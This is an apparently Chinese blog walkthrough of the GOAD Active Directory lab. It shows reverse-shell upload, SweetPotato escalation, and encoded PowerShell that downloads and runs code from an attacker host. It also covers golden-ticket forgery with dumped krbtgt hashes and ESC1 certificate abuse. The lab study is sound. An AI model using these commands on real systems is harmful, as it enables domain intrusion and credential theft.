GOAD-v2 -内网渗透

已于 2024-03-14 11:26:12 修改
阅读量493 收藏 7
点赞数 9
文章标签: 信息安全 web安全 网络安全 工具开发 安全
于 2024-03-13 17:15:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/136606123
版权
文章描述了一次针对192.168.56.22的攻击演练,涉及端口扫描发现开放端口,使用工具如MSFVenom、CobaltStrike和SWEETPotato进行权限提升,包括通过GoldenTicket和Kerberos获取凭证,以及生成和利用证书的过程。
摘要由CSDN通过智能技术生成

traget: 192.168.56.22

Recon

Port Scan

Open 192.168.56.22:80
Open 192.168.56.22:135
Open 192.168.56.22:445
Open 192.168.56.22:3389
Open 192.168.56.22:5985
Open 192.168.56.22:5986

HTTP - 80

dirsearch -u http://192.168.56.128/

Init access

使用 msfvenom 生成 aspx 的反弹 shell 的加载器

然后将 payload 替换为 Cobalt Strike 生成的

上传文件后,访问 rev.aspx 即可得到会话

权限如下

使用 SwePotato 提权,生成一个 powershell payload 用于上线

编码载入内存部分

执行命令

execute-assembly /home/kali/goad/SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANQA2AC4AMQAzADEALwBhACIAKQApAA=="

得到 SYSTEM 权限

域内信息搜集

凭据获取

在使用 logonpasswords 获取凭据后得到

PowerView 枚举

Get-DomainController | select Forest, Name, OSVersion | fl

Get-ForestDomain

PTH

.\Rubeus.exe golden /rc4:c6bcb0ebcea22b4dc13e62ba4c6398a7 /user:cersei.lannister /domain:north.sevenkingdoms.local /sid:S-1-5-21-2093262678-229104660-4185661406 /sids:S-1-5-21-3621576433-799811104-949646468-512 /ptt

kerberos::golden /user:cersei.lannister /domain:north.sevenkingdoms.local /sid:S-1-5-21-2093262678-229104660-4185661406 /sids:S-1-5-21-3621576433-799811104-949646468-512 /krbtgt:c6bcb0ebcea22b4dc13e62ba4c6398a7 /ptt

跨域

[[mimikatz-跨域]]
在得到 域控后,根据之前的信息还有父域 sevenkingdoms.local

Get-DomainTrust

Sid History

为了得到父域,我们需要以下信息来伪造 金票

dcsync north.sevenkingdoms.local NORTH\krbtgt
...[snip]...
Object Security ID   : S-1-5-21-2093262678-229104660-4185661406-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: c6bcb0ebcea22b4dc13e62ba4c6398a7
    ntlm- 0: c6bcb0ebcea22b4dc13e62ba4c6398a7
    lm  - 0: d9d82f63db8d7d66ce0218b79baf7e49

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : e80e6e18fcaf76e5347f9fafa6374a28

* Primary:Kerberos-Newer-Keys *
    Default Salt : NORTH.SEVENKINGDOMS.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 49f7b849e7d0fc03b52cadb70404fee208ff19e756edcb0181cf7fe69f3c2330
      aes128_hmac       (4096) : e171a3731c6387c6a43b02b701b6efb8
      des_cbc_md5       (4096) : 9102a29b10385bc4
...[snip]...

获取 sid

beacon> powershell Get-DomainGroup -Identity "Domain Admins" -Domain sevenkingdoms.local -Properties ObjectSid

objectsid                                  
---------                                  
S-1-5-21-3621576433-799811104-949646468-512

beacon> powershell Get-DomainController -Domain sevenkingdoms.local | select Name

Name                            
----                            
kingslanding.sevenkingdoms.local

[09/17 23:08:37] beacon> execute-assembly /home/kali/goad/Rubeus.exe golden /rc4:c6bcb0ebcea22b4dc13e62ba4c6398a7 /user:administrator /domain:north.sevenkingdoms.local /sid:S-1-5-21-2093262678-229104660-4185661406 /sids:S-1-5-21-3621576433-799811104-949646468-519 /nowrap



[09/17 23:09:15] beacon> execute-assembly /home/kali/goad/Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:north /username:administrator /password:FakePass

得到父域,至此已得此森林,

essos.local


beacon> execute-assembly /home/kali/goad/SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANQA2AC4AMQAzADEALwBiACIAKQApAA=="

beacon> connect 127.0.0.1
[*] Tasked to connect to 127.0.0.1:8000
[+] host called home, sent: 20 bytes
[+] established link to child beacon: 192.168.56.7

生成证书,报错解决方法 将pfx导入IIS Windows server 2016 - 指定的网络密码不正确 - VoidCC

Certify.exe request /ca:braavos.essos.local\ESSOS-CA /template:ESC1 /altname:administrator

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -legacy -out cert.pfx

Rubeus.exe asktgt /user:administrator /certificate:c:\Users\jorah.mormont\Desktop\cert.pfx /password:123123 /nowrap

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:essos /username:administrator /password:FakePass /ticket:
赛博雨天
关注
  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
开源项目-gophergala2016-goad.zip
09-04
在压缩包文件名称列表中,"goad-master"可能是指项目的源代码主分支。通常,开源项目会使用Git进行版本控制,"master"分支是默认的主分支,包含了项目最新的稳定代码。开发者可以从这个分支克隆或下载代码,然后根据...
load-tests:PLUUP的BLU负载测试
04-12
此外,还有像`goconcurrent`和`goad`等第三方库,可以帮助我们更好地管理和控制并发执行。 4. **数据生成**:为了使测试更接近实际环境,我们可能需要生成大量的随机数据,如用户ID、商品ID等。Go语言的`math/rand`...
渗透(一)-域环境搭建
黑白的博客
04-28 4651
到这里,相信你的域环境也已经成功创建,可以简单做一下调试桥接模式的之间都能ping通,kali服务器ping不通仅主机模式的仅主机模式的之间都能ping通,也能ping通我们设置的域student.comNAT模式可以ping通所有,当然也能ping通我们设置的域student.com其实在这个域环境中,只需要桥接和仅主机两种络模式就可以模拟内外,包括DMZ,为什么要单独加一台centos7-1,而且是NAT模式的呢?
goad-hery.zip_系统编程_Others_
08-11
标题中的"goad-hery.zip"是一个压缩包文件的名称,其中包含了关于系统编程的资源,特别是与"Others"相关的主题。这个"Others"可能是指不局限于某一特定领域或技术的广义系统编程知识。描述中提到的"Visualc++ ...
BRAIN-SAT_scComp:BRAin交互式测序分析工具
05-19
这里提供了在GOAD的单个单元组件开发过程中创建的代码。 客户:Marissa Dubbelaar和Erik Boddeke Hanze Hogeschool:Ronald Wedema 该存储库包含什么? 具有添加到GOAD的Vue项目的单单元组件 如何设置? 克隆...
Stierlin, H.、Rucker-Embden, I.、Wetzel, N. 和 Wirshching, M. (1980)。 与家人的第一次面谈。 纽约:Brunner/Mazel,239 页,[美元]25.00
06-29
Stierlin, H.、Rucker-Embden, I.、Wetzel, N. 和 Wirshching, M. (1980)。...与家人的第一次面谈。...在一本关于人格的书的结尾处,有一些很长但主要是有趣和有用的...GOAD, NA (1982)。 心理差异:原因、后果和用途 使用
Golang_GoHTTP负载测试工具和库超过9000.zip
最新发布
05-26
4. **goad** - Goad是一个分布式HTTP负载测试工具,它能够并行运行多个本地或远程的Go进程,从而实现大规模的负载测试。 5. **httping** - 这是一个轻量级的HTTP请求工具,可以用来快速检查服务器的响应时间和可用...
初中英语常用不规则动词的过去式读音资料与过去分词、现在分词.doc
09-20
动词"go"的过去式读音是"went",而不是"goad"。 英语不规则动词的过去式读音资料可以分为多种形式,例如: * 动词的过去式读音与现在式相同,只是时态不同,例如"cost"、"cut"、"put"等。 * 动词的过去式读音与...
Weis, L. (1985)。 在两个世界之间:城市社区学院的黑人学生。 波士顿:Routledge 和 Kegan Paul,220 页,[美元]18.95
06-29
Goad Lodi (CA) 联合学区参考 COHEN, J. (1977)。 KAVALE, K. (1981)。 伊利诺伊州心理语言能力测试 (ITPA) 的功能:它们是否可训练? 瓦尔贝罗,H.J。 (1984)。 提高美国学校的生产力。 教育领导,41, 19-27。 行为...
WordChainSolver
07-14
铅 → 负载 → GOAD → 黄金 指示 如果导入到 IDE 中,则可以通过运行 Launcher 类来使用它。 或者,如果使用提供的 jar,它可以从命令行运行。 两种选择 寻找最短链 填充返回单个路径。 这将是找到的最短链。 ...
详解Linux中正则表达式的应用
12-13
1、组成 普通字符:普通字符串,没有特殊含义 特殊字符:在正则表达式中具有特殊的含义 正则表达式中常见的meta字符【特殊字符】 2、POSIX BRE【基本】与ERE【扩展】中都有的meta字符 ... 6 goad  7  8 
unce:为什么要在可以 unce 时进行投票?
06-21
git clone https://github.com/kofalt/unce.git && ./unce/goad && ./unce/unce 你会收到~/.config/unce/unce.toml各种消费者的位置; 支持ATM,github。 如果notify-send "lol"在你的系统上不起作用, unce也不会...
Dutile, FN, Foust, CH, & Webster, DR (Eds.)。 幼儿干预和青少年犯罪。 马萨诸塞州列克星敦:列克星敦图书公司,DC Heath & Co.,1982 年,193 页,[美元]23.95。 Frank, M. (Ed.) 儿童和家庭的初级预防。 纽约:Haworth Press,119 页,[美元]20.00
06-29
GOAD, NA 使用个性来个性化教学。 圣地亚哥:EdlTS,1979 年。心理差异:CauseJ、后果和在教育和指导中的用途。 圣地亚哥:编辑,1982 年。 James A. Wakefield, Jr. 加利福尼亚州立大学,Stanislaus DUTILE,FN,...
GPS精密单点定位周跳的探测与修复方法.pdf
09-08
一种常见的周跳探测方法是电离层残差法,由Goad在1986年提出。这种方法利用电离层对不同频率的GPS信号的不同延迟来探测周跳。当电离层稳定且采样间隔较短时,电离层残差的变化应保持平稳。如果残差出现突然变化,...
mirage:适用于您的Web浏览器的基于文本的冒险游戏
05-06
海市age楼 Mirage是一款基于文本的冒险游戏。...I'm not trying to goad but I'm calling you weak 在地平线上 讯息传递 聊天记录 物体感觉(味觉,触觉,气味,听觉,外观) 维基检查 验证 多人游戏
软件开发:软件工程在软件开发中的运用.pdf
09-07
面向对象的软件开发方法有Goad方法和OMT方法,它们都是面向对象软发方法的基础,它们提出是以对象为单位进行问题分析,可以将问题的结果反映到问题域中,更接近人处理问题的方法。 现代软件开发的有效运用,软件...
[Windows] Windows Server 2012 Automation with PowerShell Cookbook (英文版)
08-29
☆ 资源说明:☆ [Packt Publishing] Windows Server 2012 Automation ...[作者信息] Ed Goad [出版机构] Packt Publishing [出版日期] 2013年03月26日 [图书页数] 372页 [图书语言] 英语 [图书格式] PDF 格式
js cookies 常见页木马挂马代码 24小时只加载一次
12-10
代码如下:<div xss=removed> [removed] function goad(){ var Then = new Date() Then.setTime(Then.getTime() + 2*60*60*1000) var cookieString = new String([removed]) var cookieHeader = “Cookier1=” var ...
portfolio
03-30
Matt Goad的图片组合描述一站式服务,了解我,我的工作历史和项目,我最喜欢的报价以及联系信息。 我什至可以添加一些猫的照片。学分我使用的开放源CSS库进行样式设置。 我从( 创建的获得了一些启发。 我的英雄照片...
接口压力测试工具,go语言
11-16
然而,对于复杂的压力测试场景,我们可能需要更专业的库,如`vegeta`或`goad`。这些库允许我们配置并发数、请求速率等参数,进行大规模的压力测试。 以`vegeta`为例,它是一个强大的HTTP负载测试工具,支持命令行和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值